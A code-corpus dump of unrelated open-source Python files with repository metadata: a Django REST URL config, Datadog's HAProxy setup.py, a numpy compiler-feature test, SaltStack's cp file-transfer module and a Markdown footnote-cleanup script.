"MIT"
] | null | null | null | from django.urls import path, include
from rest_framework.routers import DefaultRouter
from profiles_api import views
router = DefaultRouter()
router.register('hello-viewset', views.HelloViewSet, basename='hello-viewset')
router.register('profile', views.UserProfileViewSet)
router.register('feed', views.ProfileFeedItemViewSet)
urlpatterns = [
path('hello-view/', views.HelloApiView.as_view()),
path('login/', views.UserLoginApiView.as_view()),
] + router.urls
| 29.625 | 78 | 0.776371 |
1be1533dde190bf2f12e1bb737dcf9a782ee468f | 1,845 | py | Python | haproxy/setup.py | vcabbage/integrations-core | 449aa06adbb2f37072336fc71c50a4b5385cfd8f | [
"BSD-3-Clause"
] | null | null | null | haproxy/setup.py | vcabbage/integrations-core | 449aa06adbb2f37072336fc71c50a4b5385cfd8f | [
"BSD-3-Clause"
] | null | null | null | haproxy/setup.py | vcabbage/integrations-core | 449aa06adbb2f37072336fc71c50a4b5385cfd8f | [
"BSD-3-Clause"
] | null | null | null | # To use a consistent encoding
from codecs import open
from os import path
from setuptools import setup
HERE = path.abspath(path.dirname(__file__))
# Get version info
ABOUT = {}
with open(path.join(HERE, "datadog_checks", "haproxy", "__about__.py")) as f:
exec(f.read(), ABOUT)
# Get the long description from the README file
with open(path.join(HERE, 'README.md'), encoding='utf-8') as f:
long_description = f.read()
def get_dependencies():
dep_file = path.join(HERE, 'requirements.in')
if not path.isfile(dep_file):
return []
with open(dep_file, encoding='utf-8') as f:
return f.readlines()
CHECKS_BASE_REQ = 'datadog-checks-base>=11.0.0'
setup(
name='datadog-haproxy',
version=ABOUT["__version__"],
description='The HAProxy check',
long_description=long_description,
long_description_content_type='text/markdown',
keywords='datadog agent haproxy check',
# The project's main homepage.
url='https://github.com/DataDog/integrations-core',
# Author details
author='Datadog',
author_email='packages@datadoghq.com',
# License
license='BSD',
# See https://pypi.python.org/pypi?%3Aaction=list_classifiers
classifiers=[
'Development Status :: 5 - Production/Stable',
'Intended Audience :: Developers',
'Intended Audience :: System Administrators',
'Topic :: System :: Monitoring',
'License :: OSI Approved :: BSD License',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
],
# The package we're going to ship
packages=['datadog_checks.haproxy'],
# Run-time dependencies
install_requires=[CHECKS_BASE_REQ],
extras_require={'deps': get_dependencies()},
# Extra files to ship with the wheel package
include_package_data=True,
)
| 29.758065 | 77 | 0.674255 |
244748e5889af6bf955d242e0aecf1064896c487 | 6,308 | py | Python | numpy/distutils/tests/test_ccompiler_opt_conf.py | kurtamohler/numpy | 73157efcd17da95ce984d1595ac4907233b9dbf5 | [
"BSD-3-Clause"
] | 3 | 2021-02-06T06:47:30.000Z | 2021-08-11T10:05:27.000Z | numpy/distutils/tests/test_ccompiler_opt_conf.py | kurtamohler/numpy | 73157efcd17da95ce984d1595ac4907233b9dbf5 | [
"BSD-3-Clause"
] | 169 | 2020-12-25T07:10:57.000Z | 2022-03-29T22:12:31.000Z | numpy/distutils/tests/test_ccompiler_opt_conf.py | kurtamohler/numpy | 73157efcd17da95ce984d1595ac4907233b9dbf5 | [
"BSD-3-Clause"
] | 1 | 2021-04-17T03:10:32.000Z | 2021-04-17T03:10:32.000Z | import unittest
from os import sys, path
is_standalone = __name__ == '__main__' and __package__ is None
if is_standalone:
sys.path.append(path.abspath(path.join(path.dirname(__file__), "..")))
from ccompiler_opt import CCompilerOpt
else:
from numpy.distutils.ccompiler_opt import CCompilerOpt
arch_compilers = dict(
x86 = ("gcc", "clang", "icc", "iccw", "msvc"),
x64 = ("gcc", "clang", "icc", "iccw", "msvc"),
ppc64 = ("gcc", "clang"),
ppc64le = ("gcc", "clang"),
armhf = ("gcc", "clang"),
aarch64 = ("gcc", "clang"),
narch = ("gcc",)
)
class FakeCCompilerOpt(CCompilerOpt):
fake_info = ""
def __init__(self, *args, **kwargs):
CCompilerOpt.__init__(self, None, **kwargs)
def dist_compile(self, sources, flags, **kwargs):
return sources
def dist_info(self):
return FakeCCompilerOpt.fake_info
@staticmethod
def dist_log(*args, stderr=False):
pass
class _TestConfFeatures(FakeCCompilerOpt):
"""A hook to check the sanity of configured features
- before it called by the abstract class '_Feature'
"""
def conf_features_partial(self):
conf_all = self.conf_features
for feature_name, feature in conf_all.items():
self.test_feature(
"attribute conf_features",
conf_all, feature_name, feature
)
conf_partial = FakeCCompilerOpt.conf_features_partial(self)
for feature_name, feature in conf_partial.items():
self.test_feature(
"conf_features_partial()",
conf_partial, feature_name, feature
)
return conf_partial
def test_feature(self, log, search_in, feature_name, feature_dict):
error_msg = (
"during validate '{}' within feature '{}', "
"march '{}' and compiler '{}'\n>> "
).format(log, feature_name, self.cc_march, self.cc_name)
if not feature_name.isupper():
raise AssertionError(error_msg + "feature name must be in uppercase")
for option, val in feature_dict.items():
self.test_option_types(error_msg, option, val)
self.test_duplicates(error_msg, option, val)
self.test_implies(error_msg, search_in, feature_name, feature_dict)
self.test_group(error_msg, search_in, feature_name, feature_dict)
self.test_extra_checks(error_msg, search_in, feature_name, feature_dict)
def test_option_types(self, error_msg, option, val):
for tp, available in (
((str, list), (
"implies", "headers", "flags", "group", "detect", "extra_checks"
)),
((str,), ("disable",)),
((int,), ("interest",)),
((bool,), ("implies_detect",)),
((bool, type(None)), ("autovec",)),
) :
found_it = option in available
if not found_it:
continue
if not isinstance(val, tp):
error_tp = [t.__name__ for t in (*tp,)]
error_tp = ' or '.join(error_tp)
raise AssertionError(error_msg +
"expected '%s' type for option '%s' not '%s'" % (
error_tp, option, type(val).__name__
))
break
if not found_it:
raise AssertionError(error_msg + "invalid option name '%s'" % option)
def test_duplicates(self, error_msg, option, val):
if option not in (
"implies", "headers", "flags", "group", "detect", "extra_checks"
) : return
if isinstance(val, str):
val = val.split()
if len(val) != len(set(val)):
raise AssertionError(error_msg + "duplicated values in option '%s'" % option)
def test_implies(self, error_msg, search_in, feature_name, feature_dict):
if feature_dict.get("disabled") is not None:
return
implies = feature_dict.get("implies", "")
if not implies:
return
if isinstance(implies, str):
implies = implies.split()
if feature_name in implies:
raise AssertionError(error_msg + "feature implies itself")
for impl in implies:
impl_dict = search_in.get(impl)
if impl_dict is not None:
if "disable" in impl_dict:
raise AssertionError(error_msg + "implies disabled feature '%s'" % impl)
continue
raise AssertionError(error_msg + "implies non-exist feature '%s'" % impl)
def test_group(self, error_msg, search_in, feature_name, feature_dict):
if feature_dict.get("disabled") is not None:
return
group = feature_dict.get("group", "")
if not group:
return
if isinstance(group, str):
group = group.split()
for f in group:
impl_dict = search_in.get(f)
if not impl_dict or "disable" in impl_dict:
continue
raise AssertionError(error_msg +
"in option 'group', '%s' already exists as a feature name" % f
)
def test_extra_checks(self, error_msg, search_in, feature_name, feature_dict):
if feature_dict.get("disabled") is not None:
return
extra_checks = feature_dict.get("extra_checks", "")
if not extra_checks:
return
if isinstance(extra_checks, str):
extra_checks = extra_checks.split()
for f in extra_checks:
impl_dict = search_in.get(f)
if not impl_dict or "disable" in impl_dict:
continue
raise AssertionError(error_msg +
"in option 'extra_checks', extra test case '%s' already exists as a feature name" % f
)
class TestConfFeatures(unittest.TestCase):
def __init__(self, methodName="runTest"):
unittest.TestCase.__init__(self, methodName)
self.setup()
def setup(self):
FakeCCompilerOpt.conf_nocache = True
def test_features(self):
for arch, compilers in arch_compilers.items():
for cc in compilers:
FakeCCompilerOpt.fake_info = arch + cc
_TestConfFeatures()
if is_standalone:
unittest.main()
| 35.638418 | 101 | 0.585447 |
382dc09d9e39a5b0271ddade339bd982e16f1ee3 | 24,754 | py | Python | salt/modules/cp.py | l2ol33rt/salt | ff68bbd9f4bda992a3e039822fb32f141e94347c | [
"Apache-2.0"
] | null | null | null | salt/modules/cp.py | l2ol33rt/salt | ff68bbd9f4bda992a3e039822fb32f141e94347c | [
"Apache-2.0"
] | null | null | null | salt/modules/cp.py | l2ol33rt/salt | ff68bbd9f4bda992a3e039822fb32f141e94347c | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
'''
Minion side functions for salt-cp
'''
# Import python libs
from __future__ import absolute_import
import os
import logging
import fnmatch
# Import salt libs
import salt.minion
import salt.fileclient
import salt.utils
import salt.utils.files
import salt.utils.url
import salt.crypt
import salt.transport
from salt.exceptions import CommandExecutionError
from salt.ext.six.moves.urllib.parse import urlparse as _urlparse # pylint: disable=import-error,no-name-in-module
# Import 3rd-party libs
import salt.ext.six as six
log = logging.getLogger(__name__)
__proxyenabled__ = ['*']
def _auth():
'''
Return the auth object
'''
if 'auth' not in __context__:
__context__['auth'] = salt.crypt.SAuth(__opts__)
return __context__['auth']
def _gather_pillar(pillarenv, pillar_override):
'''
Whenever a state run starts, gather the pillar data fresh
'''
pillar = salt.pillar.get_pillar(
__opts__,
__grains__,
__opts__['id'],
__opts__['environment'],
pillar=pillar_override,
pillarenv=pillarenv
)
ret = pillar.compile_pillar()
if pillar_override and isinstance(pillar_override, dict):
ret.update(pillar_override)
return ret
def recv(files, dest):
'''
Used with salt-cp, pass the files dict, and the destination.
This function receives small fast copy files from the master via salt-cp.
It does not work via the CLI.
'''
ret = {}
for path, data in six.iteritems(files):
if os.path.basename(path) == os.path.basename(dest) \
and not os.path.isdir(dest):
final = dest
elif os.path.isdir(dest):
final = os.path.join(dest, os.path.basename(path))
elif os.path.isdir(os.path.dirname(dest)):
final = dest
else:
return 'Destination unavailable'
try:
with salt.utils.fopen(final, 'w+') as fp_:
fp_.write(data)
ret[final] = True
except IOError:
ret[final] = False
return ret
def _mk_client():
'''
Create a file client and add it to the context.
Each file client needs to correspond to a unique copy
of the opts dictionary, therefore it's hashed by the
id of the __opts__ dict
'''
if 'cp.fileclient_{0}'.format(id(__opts__)) not in __context__:
__context__['cp.fileclient_{0}'.format(id(__opts__))] = \
salt.fileclient.get_file_client(__opts__)
def _client():
'''
Return a client, hashed by the list of masters
'''
_mk_client()
return __context__['cp.fileclient_{0}'.format(id(__opts__))]
def _render_filenames(path, dest, saltenv, template, **kw):
'''
Process markup in the :param:`path` and :param:`dest` variables (NOT the
files under the paths they ultimately point to) according to the markup
format provided by :param:`template`.
'''
if not template:
return (path, dest)
# render the path as a template using path_template_engine as the engine
if template not in salt.utils.templates.TEMPLATE_REGISTRY:
raise CommandExecutionError(
'Attempted to render file paths with unavailable engine '
'{0}'.format(template)
)
kwargs = {}
kwargs['salt'] = __salt__
if 'pillarenv' in kw or 'pillar' in kw:
pillarenv = kw.get('pillarenv', __opts__.get('pillarenv'))
kwargs['pillar'] = _gather_pillar(pillarenv, kw.get('pillar'))
else:
kwargs['pillar'] = __pillar__
kwargs['grains'] = __grains__
kwargs['opts'] = __opts__
kwargs['saltenv'] = saltenv
def _render(contents):
'''
Render :param:`contents` into a literal pathname by writing it to a
temp file, rendering that file, and returning the result.
'''
# write out path to temp file
tmp_path_fn = salt.utils.files.mkstemp()
with salt.utils.fopen(tmp_path_fn, 'w+') as fp_:
fp_.write(contents)
data = salt.utils.templates.TEMPLATE_REGISTRY[template](
tmp_path_fn,
to_str=True,
**kwargs
)
salt.utils.safe_rm(tmp_path_fn)
if not data['result']:
# Failed to render the template
raise CommandExecutionError(
'Failed to render file path with error: {0}'.format(
data['data']
)
)
else:
return data['data']
path = _render(path)
dest = _render(dest)
return (path, dest)
def get_file(path,
dest,
saltenv='base',
makedirs=False,
template=None,
gzip=None,
**kwargs):
'''
Used to get a single file from the salt master
CLI Example:
.. code-block:: bash
salt '*' cp.get_file salt://path/to/file /minion/dest
Template rendering can be enabled on both the source and destination file
names like so:
.. code-block:: bash
salt '*' cp.get_file "salt://{{grains.os}}/vimrc" /etc/vimrc template=jinja
This example would instruct all Salt minions to download the vimrc from a
directory with the same name as their os grain and copy it to /etc/vimrc
For larger files, the cp.get_file module also supports gzip compression.
Because gzip is CPU-intensive, this should only be used in scenarios where
the compression ratio is very high (e.g. pretty-printed JSON or YAML
files).
Use the *gzip* named argument to enable it. Valid values are 1..9, where 1
is the lightest compression and 9 the heaviest. 1 uses the least CPU on
the master (and minion), 9 uses the most.
There are two ways of defining the fileserver environment (a.k.a.
``saltenv``) from which to retrieve the file. One is to use the ``saltenv``
parameter, and the other is to use a querystring syntax in the ``salt://``
URL. The below two examples are equivalent:
.. code-block:: bash
salt '*' cp.get_file salt://foo/bar.conf /etc/foo/bar.conf saltenv=config
salt '*' cp.get_file salt://foo/bar.conf?saltenv=config /etc/foo/bar.conf
.. note::
It may be necessary to quote the URL when using the querystring method,
depending on the shell being used to run the command.
'''
(path, dest) = _render_filenames(path, dest, saltenv, template, **kwargs)
path, senv = salt.utils.url.split_env(path)
if senv:
saltenv = senv
if not hash_file(path, saltenv):
return ''
else:
return _client().get_file(
path,
dest,
makedirs,
saltenv,
gzip)
def get_template(path,
dest,
template='jinja',
saltenv='base',
makedirs=False,
**kwargs):
'''
Render a file as a template before setting it down.
Warning, order is not the same as in fileclient.cp for
non breaking old API.
CLI Example:
.. code-block:: bash
salt '*' cp.get_template salt://path/to/template /minion/dest
'''
if 'salt' not in kwargs:
kwargs['salt'] = __salt__
if 'pillar' not in kwargs:
kwargs['pillar'] = __pillar__
if 'grains' not in kwargs:
kwargs['grains'] = __grains__
if 'opts' not in kwargs:
kwargs['opts'] = __opts__
return _client().get_template(
path,
dest,
template,
makedirs,
saltenv,
**kwargs)
def get_dir(path, dest, saltenv='base', template=None, gzip=None, **kwargs):
'''
Used to recursively copy a directory from the salt master
CLI Example:
.. code-block:: bash
salt '*' cp.get_dir salt://path/to/dir/ /minion/dest
get_dir supports the same template and gzip arguments as get_file.
'''
(path, dest) = _render_filenames(path, dest, saltenv, template, **kwargs)
return _client().get_dir(path, dest, saltenv, gzip)
def get_url(path, dest='', saltenv='base', makedirs=False):
'''
Used to get a single file from a URL.
path
A URL to download a file from. Supported URL schemes are: ``salt://``,
``http://``, ``https://``, ``ftp://``, ``s3://``, ``swift://`` and
``file://`` (local filesystem). If no scheme was specified, this is
equivalent of using ``file://``.
If a ``file://`` URL is given, the function just returns absolute path
to that file on a local filesystem.
The function returns ``False`` if Salt was unable to fetch a file from
a ``salt://`` URL.
dest
The default behaviour is to write the fetched file to the given
destination path. If this parameter is omitted or set as empty string
(``''``), the function places the remote file on the local filesystem
inside the Minion cache directory and returns the path to that file.
.. note::
To simply return the file contents instead, set destination to
``None``. This works with ``salt://``, ``http://``, ``https://``
and ``file://`` URLs. The files fetched by ``http://`` and
``https://`` will not be cached.
saltenv : base
Salt fileserver envrionment from which to retrieve the file. Ignored if
``path`` is not a ``salt://`` URL.
CLI Example:
.. code-block:: bash
salt '*' cp.get_url salt://my/file /tmp/this_file_is_mine
salt '*' cp.get_url http://www.slashdot.org /tmp/index.html
'''
if isinstance(dest, six.string_types):
result = _client().get_url(path, dest, makedirs, saltenv)
else:
result = _client().get_url(path, None, makedirs, saltenv, no_cache=True)
if not result:
log.error(
'Unable to fetch file {0} from saltenv {1}.'.format(
path, saltenv
)
)
return result
def get_file_str(path, saltenv='base'):
'''
Download a file from a URL to the Minion cache directory and return the
contents of that file
Returns ``False`` if Salt was unable to cache a file from a URL.
CLI Example:
.. code-block:: bash
salt '*' cp.get_file_str salt://my/file
'''
fn_ = cache_file(path, saltenv)
if isinstance(fn_, six.string_types):
with salt.utils.fopen(fn_, 'r') as fp_:
data = fp_.read()
return data
return fn_
def cache_file(path, saltenv='base'):
'''
Used to cache a single file on the Minion
Returns the location of the new cached file on the Minion.
CLI Example:
.. code-block:: bash
salt '*' cp.cache_file salt://path/to/file
There are two ways of defining the fileserver environment (a.k.a.
``saltenv``) from which to cache the file. One is to use the ``saltenv``
parameter, and the other is to use a querystring syntax in the ``salt://``
URL. The below two examples are equivalent:
.. code-block:: bash
salt '*' cp.cache_file salt://foo/bar.conf saltenv=config
salt '*' cp.cache_file salt://foo/bar.conf?saltenv=config
If the path being cached is a ``salt://`` URI, and the path does not exist,
then ``False`` will be returned.
.. note::
It may be necessary to quote the URL when using the querystring method,
depending on the shell being used to run the command.
'''
contextkey = '{0}_|-{1}_|-{2}'.format('cp.cache_file', path, saltenv)
path_is_remote = _urlparse(path).scheme in ('http', 'https', 'ftp')
try:
if path_is_remote and contextkey in __context__:
# Prevent multiple caches in the same salt run. Affects remote URLs
# since the master won't know their hash, so the fileclient
# wouldn't be able to prevent multiple caches if we try to cache
# the remote URL more than once.
if os.path.isfile(__context__[contextkey]):
return __context__[contextkey]
else:
# File is in __context__ but no longer exists in the minion
# cache, get rid of the context key and re-cache below.
# Accounts for corner case where file is removed from minion
# cache between cp.cache_file calls in the same salt-run.
__context__.pop(contextkey)
except AttributeError:
pass
path, senv = salt.utils.url.split_env(path)
if senv:
saltenv = senv
result = _client().cache_file(path, saltenv)
if not result:
log.error(
'Unable to cache file \'{0}\' from saltenv \'{1}\'.'.format(
path, saltenv
)
)
if path_is_remote:
# Cache was successful, store the result in __context__ to prevent
# multiple caches (see above).
__context__[contextkey] = result
return result
def cache_files(paths, saltenv='base'):
'''
Used to gather many files from the Master, the gathered files will be
saved in the minion cachedir reflective to the paths retrieved from the
Master
CLI Example:
.. code-block:: bash
salt '*' cp.cache_files salt://pathto/file1,salt://pathto/file1
There are two ways of defining the fileserver environment (a.k.a.
``saltenv``) from which to cache the files. One is to use the ``saltenv``
parameter, and the other is to use a querystring syntax in the ``salt://``
URL. The below two examples are equivalent:
.. code-block:: bash
salt '*' cp.cache_files salt://foo/bar.conf,salt://foo/baz.conf saltenv=config
salt '*' cp.cache_files salt://foo/bar.conf?saltenv=config,salt://foo/baz.conf?saltenv=config
The querystring method is less useful when all files are being cached from
the same environment, but is a good way of caching files from multiple
different environments in the same command. For example, the below command
will cache the first file from the ``config1`` environment, and the second
one from the ``config2`` environment.
.. code-block:: bash
salt '*' cp.cache_files salt://foo/bar.conf?saltenv=config1,salt://foo/bar.conf?saltenv=config2
.. note::
It may be necessary to quote the URL when using the querystring method,
depending on the shell being used to run the command.
'''
return _client().cache_files(paths, saltenv)
def cache_dir(path, saltenv='base', include_empty=False, include_pat=None,
exclude_pat=None):
'''
Download and cache everything under a directory from the master
include_pat : None
Glob or regex to narrow down the files cached from the given path. If
matching with a regex, the regex must be prefixed with ``E@``,
otherwise the expression will be interpreted as a glob.
.. versionadded:: 2014.7.0
exclude_pat : None
Glob or regex to exclude certain files from being cached from the given
path. If matching with a regex, the regex must be prefixed with ``E@``,
otherwise the expression will be interpreted as a glob.
.. note::
If used with ``include_pat``, files matching this pattern will be
excluded from the subset of files defined by ``include_pat``.
.. versionadded:: 2014.7.0
CLI Examples:
.. code-block:: bash
salt '*' cp.cache_dir salt://path/to/dir
salt '*' cp.cache_dir salt://path/to/dir include_pat='E@*.py$'
'''
return _client().cache_dir(
path, saltenv, include_empty, include_pat, exclude_pat
)
def cache_master(saltenv='base'):
'''
Retrieve all of the files on the master and cache them locally
CLI Example:
.. code-block:: bash
salt '*' cp.cache_master
'''
return _client().cache_master(saltenv)
def cache_local_file(path):
'''
Cache a local file on the minion in the localfiles cache
CLI Example:
.. code-block:: bash
salt '*' cp.cache_local_file /etc/hosts
'''
if not os.path.exists(path):
return ''
path_cached = is_cached(path)
# If the file has already been cached, return the path
if path_cached:
path_hash = hash_file(path)
path_cached_hash = hash_file(path_cached)
if path_hash['hsum'] == path_cached_hash['hsum']:
return path_cached
# The file hasn't been cached or has changed; cache it
return _client().cache_local_file(path)
def list_states(saltenv='base'):
'''
List all of the available state modules in an environment
CLI Example:
.. code-block:: bash
salt '*' cp.list_states
'''
return _client().list_states(saltenv)
def list_master(saltenv='base', prefix=''):
'''
List all of the files stored on the master
CLI Example:
.. code-block:: bash
salt '*' cp.list_master
'''
return _client().file_list(saltenv, prefix)
def list_master_dirs(saltenv='base', prefix=''):
'''
List all of the directories stored on the master
CLI Example:
.. code-block:: bash
salt '*' cp.list_master_dirs
'''
return _client().dir_list(saltenv, prefix)
def list_master_symlinks(saltenv='base', prefix=''):
'''
List all of the symlinks stored on the master
CLI Example:
.. code-block:: bash
salt '*' cp.list_master_symlinks
'''
return _client().symlink_list(saltenv, prefix)
def list_minion(saltenv='base'):
'''
List all of the files cached on the minion
CLI Example:
.. code-block:: bash
salt '*' cp.list_minion
'''
return _client().file_local_list(saltenv)
def is_cached(path, saltenv='base'):
'''
Return a boolean if the given path on the master has been cached on the
minion
CLI Example:
.. code-block:: bash
salt '*' cp.is_cached salt://path/to/file
'''
return _client().is_cached(path, saltenv)
def hash_file(path, saltenv='base'):
'''
Return the hash of a file, to get the hash of a file on the
salt master file server prepend the path with salt://<file on server>
otherwise, prepend the file with / for a local file.
CLI Example:
.. code-block:: bash
salt '*' cp.hash_file salt://path/to/file
'''
path, senv = salt.utils.url.split_env(path)
if senv:
saltenv = senv
return _client().hash_file(path, saltenv)
def stat_file(path, saltenv='base', octal=True):
'''
Return the permissions of a file, to get the permissions of a file on the
salt master file server prepend the path with salt://<file on server>
otherwise, prepend the file with / for a local file.
CLI Example:
.. code-block:: bash
salt '*' cp.stat_file salt://path/to/file
'''
path, senv = salt.utils.url.split_env(path)
if senv:
saltenv = senv
stat = _client().hash_and_stat_file(path, saltenv)[1]
if stat is None:
return stat
return salt.utils.st_mode_to_octal(stat[0]) if octal is True else stat[0]
def push(path, keep_symlinks=False, upload_path=None, remove_source=False):
'''
WARNING Files pushed to the master will have global read permissions..
Push a file from the minion up to the master, the file will be saved to
the salt master in the master's minion files cachedir
(defaults to ``/var/cache/salt/master/minions/minion-id/files``)
Since this feature allows a minion to push a file up to the master server
it is disabled by default for security purposes. To enable, set
``file_recv`` to ``True`` in the master configuration file, and restart the
master.
keep_symlinks
Keep the path value without resolving its canonical form
upload_path
Provide a different path inside the master's minion files cachedir
remove_source
Remove the source file on the minion
.. versionadded:: 2016.3.0
CLI Example:
.. code-block:: bash
salt '*' cp.push /etc/fstab
salt '*' cp.push /etc/system-release keep_symlinks=True
salt '*' cp.push /etc/fstab upload_path='/new/path/fstab'
salt '*' cp.push /tmp/filename remove_source=True
'''
log.debug('Trying to copy \'{0}\' to master'.format(path))
if '../' in path or not os.path.isabs(path):
log.debug('Path must be absolute, returning False')
return False
if not keep_symlinks:
path = os.path.realpath(path)
if not os.path.isfile(path):
log.debug('Path failed os.path.isfile check, returning False')
return False
auth = _auth()
if upload_path:
if '../' in upload_path:
log.debug('Path must be absolute, returning False')
log.debug('Bad path: {0}'.format(upload_path))
return False
load_path = upload_path.lstrip(os.sep)
else:
load_path = path.lstrip(os.sep)
# Normalize the path. This does not eliminate
# the possibility that relative entries will still be present
load_path_normal = os.path.normpath(load_path)
# If this is Windows and a drive letter is present, remove it
load_path_split_drive = os.path.splitdrive(load_path_normal)[1]
# Finally, split the remaining path into a list for delivery to the master
load_path_list = [_f for _f in load_path_split_drive.split(os.sep) if _f]
load = {'cmd': '_file_recv',
'id': __opts__['id'],
'path': load_path_list,
'tok': auth.gen_token('salt')}
channel = salt.transport.Channel.factory(__opts__)
with salt.utils.fopen(path, 'rb') as fp_:
init_send = False
while True:
load['loc'] = fp_.tell()
load['data'] = fp_.read(__opts__['file_buffer_size'])
if not load['data'] and init_send:
if remove_source:
try:
salt.utils.rm_rf(path)
log.debug('Removing source file \'{0}\''.format(path))
except IOError:
log.error('cp.push failed to remove file \
\'{0}\''.format(path))
return False
return True
ret = channel.send(load)
if not ret:
log.error('cp.push Failed transfer failed. Ensure master has '
'\'file_recv\' set to \'True\' and that the file '
'is not larger than the \'file_recv_size_max\' '
'setting on the master.')
return ret
init_send = True
def push_dir(path, glob=None, upload_path=None):
'''
Push a directory from the minion up to the master, the files will be saved
to the salt master in the master's minion files cachedir (defaults to
``/var/cache/salt/master/minions/minion-id/files``). It also has a glob
for matching specific files using globbing.
.. versionadded:: 2014.7.0
Since this feature allows a minion to push files up to the master server it
is disabled by default for security purposes. To enable, set ``file_recv``
to ``True`` in the master configuration file, and restart the master.
upload_path
Provide a different path and directory name inside the master's minion
files cachedir
CLI Example:
.. code-block:: bash
salt '*' cp.push /usr/lib/mysql
salt '*' cp.push /usr/lib/mysql upload_path='/newmysql/path'
salt '*' cp.push_dir /etc/modprobe.d/ glob='*.conf'
'''
if '../' in path or not os.path.isabs(path):
return False
tmpupload_path = upload_path
path = os.path.realpath(path)
if os.path.isfile(path):
return push(path, upload_path=upload_path)
else:
filelist = []
for root, _, files in os.walk(path):
filelist += [os.path.join(root, tmpfile) for tmpfile in files]
if glob is not None:
filelist = [fi for fi in filelist if fnmatch.fnmatch(os.path.basename(fi), glob)]
if not filelist:
return False
for tmpfile in filelist:
if upload_path and tmpfile.startswith(path):
tmpupload_path = os.path.join(os.path.sep,
upload_path.strip(os.path.sep),
tmpfile.replace(path, '')
.strip(os.path.sep))
ret = push(tmpfile, upload_path=tmpupload_path)
if not ret:
return ret
return True
| 31.02005 | 115 | 0.615739 |
be26a0f6d2d3766d1e5edb9faaf8810ae9630ec9 | 3,172 | py | Python | utils.py | zsilver1/dictus | 7c5fddda626a134340c5062e3ce4c2c420e300c8 | [
"MIT"
] | null | null | null | utils.py | zsilver1/dictus | 7c5fddda626a134340c5062e3ce4c2c420e300c8 | [
"MIT"
] | null | null | null | utils.py | zsilver1/dictus | 7c5fddda626a134340c5062e3ce4c2c420e300c8 | [
"MIT"
] | null | null | null | from typing import List, Dict, Set, Tuple
import os
import shutil
import re
FOOTNOTE_LINK = re.compile(r"\[\^([\w]+)\]")
FOOTNOTE_LABEL = re.compile(r"^\[\^([\w]+)]:\s?(.*)")
def cleanup_md_file(filename: str, backup: bool = True):
if backup:
shutil.copyfile(filename, f"{filename}.backup")
headers: List[str] = []
# map of header -> sub-contents
header_contents: Dict[str, str] = {}
first_header_line = -1
# map of original footnote number to its label
footnote_key_to_label: Dict[str, str] = {}
# list of footnote labels in order
fixed_footnotes: List[Tuple[str, str]] = []
footnote_set: Set[str] = set()
with open(filename) as f:
contents = f.readlines()
hit_footers = False
current_header = None
current_contents: List[str] = []
for i, line in enumerate(contents):
if line.strip().startswith("# "):
if first_header_line < 0:
first_header_line = i
header = line[2:].strip()
if current_header:
header_contents[current_header] = "".join(current_contents)
current_contents = []
headers.append(header)
current_header = header
elif m := FOOTNOTE_LABEL.match(line):
hit_footers = True
footnote_key_to_label[m.group(1)] = m.group(2)
elif current_header:
if not hit_footers:
current_contents.append(line)
if current_header:
header_contents[current_header] = "".join(current_contents)
result: List[str] = []
# we now know the correct order of the file
# first output pre-header lines
for i, line in enumerate(contents):
if i >= first_header_line:
break
result.append(line)
headers.sort()
old_to_new_footnotes: Dict[str, str] = {}
cur_footnote_index = 1
def _repl(m):
nonlocal cur_footnote_index
if m.group(1) not in old_to_new_footnotes:
if m.group(1).isnumeric():
old_to_new_footnotes[m.group(1)] = str(cur_footnote_index)
cur_footnote_index += 1
return f"[^{cur_footnote_index - 1}]"
else:
return m.group()
return f"[^{old_to_new_footnotes[m.group(1)]}]"
for header in headers:
text = header_contents[header]
for key in FOOTNOTE_LINK.findall(text):
if footnote_key_to_label[key] not in footnote_set:
fixed_footnotes.append((key, footnote_key_to_label[key]))
footnote_set.add(footnote_key_to_label[key])
text = re.sub(FOOTNOTE_LINK, _repl, text)
result.append(f"# {header}\n")
result.append(text)
# finish with footnotes
index = 1
for footnote in fixed_footnotes:
key, label = footnote
if key.isnumeric():
result.append(f"[^{index}]: {label}{os.linesep}{os.linesep}")
index += 1
else:
result.append(f"[^{key}]: {label}{os.linesep}{os.linesep}")
result_str = "".join(result).rstrip()
with open(filename, "w") as f:
f.write(result_str)
| 31.098039 | 75 | 0.592055 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.